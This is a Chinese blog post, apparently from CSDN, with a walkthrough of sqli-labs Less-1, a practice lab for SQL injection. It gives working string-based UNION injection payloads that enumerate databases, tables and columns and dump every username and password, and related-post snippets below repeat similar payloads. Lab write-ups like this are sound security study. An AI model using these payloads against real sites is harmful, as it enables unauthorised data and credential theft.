sqli-labs第一关

最新推荐文章于 2024-09-25 13:56:40 发布
最新推荐文章于 2024-09-25 13:56:40 发布
阅读量363 收藏 7
点赞数 4
分类专栏: 网安 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42558965/article/details/136238407
版权

sqli-labs第一关
首先判断是否存在注入
启动靶机之后,访问:http://ip地址/sqli-labs/Less-1/?
(查看sqli-labs源代码参考文章链接
首先要知道这一关的代码是这样的:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

先针对性的进行测试,首先,拿到一个可能存在SQL注入的网站的第一步就是判断是否存在注入,就是根据报错来看:
访问http://192.168.88.130/sqli-labs/Less-1/?id=1’,发现报错,常用的测试是否存在sql注入的方式(针对php)

1:数字型
id= x and 1=1    #页面返回正确
id= x and 1=2    #页面返回错误
执行逻辑:
select * from <表名> where id = x and 1=1
2:字符型
x' and '1'='1    #页面返回正确
x' and '1'='2    #页面返回错误

第一关的代码执行逻辑:
select * from <表名> where id = 'x' and '1'='1'

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里可以知道存在sql注入,这时候就要猜字段了
考虑到这一关是字符型注入,猜字段的方法一般使用 ?id=1' order by 3 --+,–+的作用是将代码后面的LIMIT 0,1";给注释掉:
在这里插入图片描述
在这里插入图片描述
3正确,4错误,所以这就意味当前查看的这个表有三个字段;确认回显位,回显位为2,3
在这里插入图片描述
联合查询爆出数据库名和用户名,需要让左边的执行为假,这样才会执行右边的语句

?id=1' and '1' = '2' union select 1,database(),user() --+

在这里插入图片描述
爆出版本号:

?id=1' and '1' = '2' union select 1,database(),version() --+

在这里插入图片描述
mysql版本高于5.0版本之后就存在information_schema数据库,这个库中包含了所有的表命、列名等信息;其中information_schema数据库中的tables表就存了所有表的名字,其中table_name对应表名,而table_schema对应这个表在哪个库(information_schema数据库中还有一个叫columns的表,记录了所有的表中列名的数据)。
在这里插入图片描述
在这里插入图片描述

爆出表名,因为回显限制的原因,所以通过mysql的“group_concat()”函数将所有的表名连接起来一起输出,为了显示更精确,加where进行数据库限制:

?id=1' and '1' = '2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

在这里插入图片描述
猜测可能数据在"security"数据库中的users表里,接下来爆出字段名,这时就需要查询informa_schema数据库中的另一张表columns的信息了:

?id=1' and '1' = '2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name = 'users' --+

在这里插入图片描述
得知列名之后就使用group_concat()进行查询具体信息了:

?id=1' and '1' = '2' union select 1,2,group_concat(id,username,password) from users --+

在这里插入图片描述
获得所有账号密码。

伟大灵魂导师
关注
专栏目录
sqli-labs第一关的闯关
qq_45154529的博客
01-05 2161
第一关:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
sqli-labs--第一关
wyzhxhn的博客
11-05 518
sqli-labs靶场第一关
sql-labs靶场练习第一关
最新发布
cz_071017的博客
09-25 593
id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+)来查看他的字段。通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。根据表名知道可能用户的账户和密码是在users表中接下来我们就是得到该表下的字段名以及内容。1.字符型注入&数字型注入&搜索型注入。可以将SQL注入分为两大类。
sqli-labs靶场第一关
A_450的博客
12-12 1120
sqli-labs靶场第一关
sqli-labs系列——第一关
1匹黑马
04-26 3985
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
SQLi-Labs SQL注入练习平台(第一关)
banyang6297的博客
01-18 369
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。-----百度百科   我用的是看...
sqli-labs第一关sql注入流程
qq_33598708的博客
03-28 1713
正常访问 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='1 正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='2 错误 由' and '1'='1可知道是字符型,如果是数字型的这种会提示错误。 开始注入: http://127.0.0.
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2038
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs靶场练习笔记
11-09
- 示例:判断数据库名称的第一个ASCII码值是否小于等于100。 - **第4关:单引号注入** - **特点**:当尝试使用双引号时,页面出现错误提示或异常行为。 - **测试方法**:通过构造包含单引号的SQL语句来测试是否...
sqli-labs第一关详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 2697
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 5054
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
渗透漏洞基础之sqli-labs第一关
lbg685的博客
02-20 1211
渗透漏洞超级基础之sqli-labs第一关
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1623
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-lab第一关
m0_46495271的博客
06-03 117
使用order by 判断有几页,然后用union联合注入 获得库名为security 获得表名,应该为users 查询字段 获取表的数据 0x3a是: 2.报错型注入 获得表名 获取字段,没有显示完全 显示剩下的字段 显示值 然后用同样的方法显示剩下的内容 3.用sqlmap 先获取库名 再获得表名 再通过表名获得列名 获得列名后下载数据 ...
sqli_labs第一关
weixin_30924087的博客
03-25 212
安装 从https://github.com/Audi-1/sqli-labs下载源代码 搭建环境用的是phpstudy 编辑sqli\sql-connections\db-creds.inc文件 修改mysql链接数据库帐号密码。 为了方便看见sql语句,在$sql这句话下面添加echo...这句。 $sql="SELECT * FROM users WHERE id='...
sqlilab第一关
qq_45491497的博客
07-28 2044
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
sqli-labs 第一关
weixin_48800344的博客
08-31 805
sql注入大体解释 通过构造闭合语句来执行想要执行的命令 第一关 推荐工具 HackBar 为什么不用url输入,做着做着就不知道代码那里出错了,用hackber方便简洁,其实url输入也行 第一步:判断什么型的注入 1.判断是什么型注入就要看给他错误语句是否报错 例如:判断什么型注入直接看1’ and 1=2# 1 and 1=2#那个会报错 详细因为当运行可执行指令中假如程序有错误语句会报错,如果可执行程序中有错误语句但没报错就可以看出来了 我是这么理解的,希望有更好的解释 [外链图片转存失败
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值